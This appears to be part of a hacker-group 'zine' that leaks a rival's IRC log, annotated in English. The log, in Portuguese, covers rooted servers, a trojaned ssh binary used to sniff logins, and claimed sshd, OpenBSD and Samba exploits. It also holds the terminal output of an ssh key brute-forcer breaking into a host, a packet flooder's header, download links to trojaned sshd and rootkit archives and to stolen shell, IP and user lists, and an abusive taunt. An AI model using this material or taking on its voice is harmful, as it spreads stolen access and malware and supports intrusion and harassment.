-> PRIVMSG skotch :outra coisa
-> PRIVMSG skotch :descobri
-> PRIVMSG skotch :o klux
-> PRIVMSG skotch :tem root na importec                    ->>>>>> klux has root in importec[their box] (you are right sir!)
-> PRIVMSG skotch :NAO USA MAIS ELA DE PONTE               ->>>>>> dont use it as bounce anymore! (kinda late)
<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :n vem dessas q qdo mandei o skotch.txt tinha mta maq la q vc nem tinha ownado, q eu tinha ownado sozinho
-> PRIVMSG skotch :e varias box.. ele so troca o ssh binario
-> PRIVMSG skotch :pra sniffa
<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :n to usando mais importec faz tempo
-> PRIVMSG skotch :fica ligeiro
-> PRIVMSG skotch :eu formatei ele
-> PRIVMSG skotch :deproposito
-> PRIVMSG skotch :ele veio no meu pvt
-> PRIVMSG skotch :colo uma pa de merda
-> PRIVMSG skotch :ele sabe da ig
-> PRIVMSG skotch :da locaweb
-> PRIVMSG skotch :da pop
-> PRIVMSG skotch :<skotch> n vem dessas q qdo mandei o skotch.txt tinha mta maq la q vc nem tinha ownado, q eu tinha ownado sozinho
-> PRIVMSG skotch :e vice versa
-> PRIVMSG skotch :q seja
-> PRIVMSG skotch :ouytra coisa
-> PRIVMSG skotch :peguei coisa quente
-> PRIVMSG skotch :sshd 
-> PRIVMSG skotch :hehehe
-> PRIVMSG skotch :remote expl
-> PRIVMSG skotch :openbsd local                      ->>>>>>>>>> y0y0 juz g0t a openbsd local (right, check it on milw0rm, asshole)
-> PRIVMSG skotch :tu fica de putaria
-> PRIVMSG skotch :agente perdendo tempo
<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :o openbsd vc a mando faz tempo
-> PRIVMSG skotch :mas esse novo nao
-> PRIVMSG skotch :entra na merda do msn
-> PRIVMSG skotch :e para de putaria
-> PRIVMSG skotch :por besteira
-> PRIVMSG skotch :vou te desblokear                  ->>>>>>>>> i'll unblock ya from msn babe! plz come back !
<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :to indo pro trampo
-> PRIVMSG skotch :vai para com a putaria de merda ?
<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :quem fica de putaria eh vc, falando bosta sem saber de nada
-> PRIVMSG skotch : * 
-> PRIVMSG skotch : * eXstacy ~ # gcc sshexploit.c -o sshex -lssh
-> PRIVMSG skotch : * eXstacy ~ # ./sshex -h laggy.org -l xxxxx -d keys/             ->>>>>>> w0w, this is certainly a 0day, right ? /me rolling on the floor laughing
-> PRIVMSG skotch : * [!] KEY FOUND!
-> PRIVMSG skotch : * [!] Logging in...
-> PRIVMSG skotch : * Last login: Fri Aug 15 16:05:43 2008 from xxxxxxxxxxxxxxxxx
-> PRIVMSG skotch : * xxxxx@digitaljunk ~ $  
-> PRIVMSG skotch : *
-> PRIVMSG skotch : * Not that practical since it doesnt use threads, but the code shows 
-> PRIVMSG skotch : * howto make a ssh client from scratch using libssh for what purpose 
<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :procura se informar primeiro antes de falar merda
-> PRIVMSG skotch :so joguei verde
-> PRIVMSG skotch :sou noiado
-> PRIVMSG skotch :vc tb he
-> PRIVMSG skotch :normal
<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :esse ai eh um bruteforce q usa um bug do ssh
-> PRIVMSG skotch :nao fiz mal nenhum pra vc
<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :pode demorar horas pra achar a key certa
-> PRIVMSG skotch :nao
-> PRIVMSG skotch :de 5 a 10 min
-> PRIVMSG skotch :o coideloko ja ta melhorando ele
-> PRIVMSG skotch :pra demorar menos
-> PRIVMSG skotch :hehe
-> PRIVMSG skotch :a oi ta bugada
-> PRIVMSG skotch :ele FUNCIONA
-> PRIVMSG skotch :e jaja
-> PRIVMSG skotch :to com 0day pra samba
-> PRIVMSG skotch :aguarde
<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :so falo
<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :pra vc fica esperto
<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :q tem gringo
<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :te sniffando
<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :pq fikei sabendo
-> PRIVMSG skotch :ta loko ?
-> PRIVMSG skotch :so se for na bnc
-> PRIVMSG skotch :hehehe
<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :nego q ta falando com vc
-> PRIVMSG skotch :ateh entao nao ligo
<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :soh pra causar intriga
-> PRIVMSG skotch :porra
-> PRIVMSG skotch :tu eh meu amigo ou nao eh :?
-> PRIVMSG skotch :<skotch> so falo
-> PRIVMSG skotch :<skotch> pra vc fica esperto
-> PRIVMSG skotch :<skotch> q tem gringo
-> PRIVMSG skotch :<skotch> te sniffando
-> PRIVMSG skotch :<skotch> pq fikei sabendo
-> PRIVMSG skotch :qm sniffando ?
-> PRIVMSG skotch :skotch
-> PRIVMSG skotch :fala krl
-> PRIVMSG skotch :skotch
-> PRIVMSG skotch :skotch
<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :to comend mermao
<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :e to atrasado pro trampo
<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :flw
-> PRIVMSG skotch :cara
-> PRIVMSG skotch :se tu continuar folgado
-> PRIVMSG skotch :naovaidar
-> PRIVMSG skotch :vai sew fude
-> PRIVMSG skotch :fala direito
<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :isso eh facil de vc descobrir, so vc ver quem se aproximo de vc
<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :ultimamente
<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :e n trocava ideia antes
<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :so vc pensar
-> PRIVMSG skotch :whatever
-> PRIVMSG skotch :vc
-> PRIVMSG skotch :e o thomaz
-> PRIVMSG skotch :sao os unicos
-> PRIVMSG skotch :q tem as m erda q tenho
-> PRIVMSG skotch :UNICOS
-> PRIVMSG skotch :mais ngm tem
-> PRIVMSG skotch :nao confio em m ais NGM
-> PRIVMSG skotch :eu acho q tu deveria me falar qm eh
-> PRIVMSG skotch :so isso
-> PRIVMSG skotch :e troquei de bnc ontemrs
-> PRIVMSG skotch :e troquei de bnc ontem rs                         ->>>>>> i changed my bnc yesterday! (we're glad)
-> PRIVMSG rip :skotch said to me that are sniffing me
-> PRIVMSG rip :but skotch dont know about nothing                   ->>>>>> as always, backstabbing hiZ boyfriend(skotch)


/*
 * Geminid IIb. TCP/UDP/ICMP Packet flooder
 *
 * What can i say? Enjoy! :)
 * gr33tz: PoWerPr0 and godmode0
 *

thanks for the gem source by the way!

>>> there could be more logs, but some kool guyz cant stop ddosing r47, so this is kind of boring to do
>> anyway, if we get something else in the future, we will publish again. thanks buddies.
> random logs if you have nothing to do: http://labsec.elite.vc/r47-1.log http://labsec.elite.vc/r47-2.log

##########################################################################
#       __                 __                __   __                     #
#.----.|  |--.---.-.-----.|  |_.-----.----. |  |_|  |--.----.-----.-----.#
#|  __||     |  _  |  _  ||   _|  -__|   _| |   _|     |   _|  -__|  -__|#
#|____||__|__|___._|   __||____|_____|__|   |____|__|__|__| |_____|_____|#
#                  |__|                                                  #
#                                                                        #
# - download links                                                       #
##########################################################################

<><> thiZ iZ ZeRIouZ buZInEzZ dewD!
<><> http://labsec.elite.vc/x0x0x-suckY-sshd.tar.bz2
<><> http://labsec.elite.vc/x0x0x-suckY-phalanx-suckit.tar.bz2
<><> http://labsec.elite.vc/x0x0x-suckY-shells-ips-users-allinone.tar.bz2 [we are not sharing all of them, just some random ones]

<><> please guyZ, make it priv8 ! (/me rolleyes :B)

- kool&klean chapter.

##########################################################################
#              _               _              ___                        #
#         ___ | |_  ___  ___ _| |_ ___  _ _  | | '___  _ _  _ _          #
#        / | '| . |<_> || . \ | | / ._>| '_> | |-/ . \| | || '_>         #
#        \_|_.|_|_|<___||  _/ |_| \___.|_|   |_| \___/`___||_|           #
#                       |_|                                              #
#                                                                        #
# - conclusion                                                           #
##########################################################################


----------------- reflection time
>.......... whats the point of all this ? prove that you are better than someone ?
>......... what a joke. just coz you are lucky and had the chance it doesnt mean you are bl4ckh47.
>........ your zines are pathetic. what the fuck is this 'messages' shit in the bottom of them ?
>....... like you are able to hack someone by yourself, eh ? you cant do shit x0x0x, you ARE shit.
>...... why thank soldiers and all blackhats? you dont belong to any of them, none of them like you.
>..... why would someone send you a mail? nobody cares about you, dipshit.
>.... i cant really believe that you spent time creating a new mail just koz of your second shit zine, hahahahaha what a joke
>... stop playing hacker, you are not hacker, - we are not hackers -, you cant even do shellscript, get a life while you can.
>.. a kiss to zmda
>. think twice before you fuck with us, asshole. we know you, we know what you can do, and we know what you cant do.
> just to finish:

******************************** m355 w17h 7h3 beZt - diE liKE th3 r3s7 ********************************
;
;
; _____          __     _______             
;|     |_.---.-.|  |--.|     __|.-----.----.
;|       |  _  ||  _  ||__     ||  -__|  __|
;|_______|___._||_____||_______||_____|____|
;                                           
; _______           __               __         __              
;|_     _|.-----.--|  |.--.--.-----.|  |_.----.|__|.-----.-----.
; _|   |_ |     |  _  ||  |  |__ --||   _|   _||  ||  -__|__ --|
;|_______||__|__|_____||_____|_____||____|__|  |__||_____|_____|
;                                                               ;
;
; #LABSEC @ EFNET - closed to friends, of course.
;
; klux/djow - include - input - r3n4t0 - memelo - deadcow - w3b - kernel` - kylebond - fseek
;
; lAmE ZiNE wRitTeN bY:
;
; klux - spoof1 @RR0B@ gmail.com - hAppY flOodiNg
;
;
; wE iZ watCHiNg U
******************************** m355 w17h 7h3 beZt - diE liKE th3 r3s7 ********************************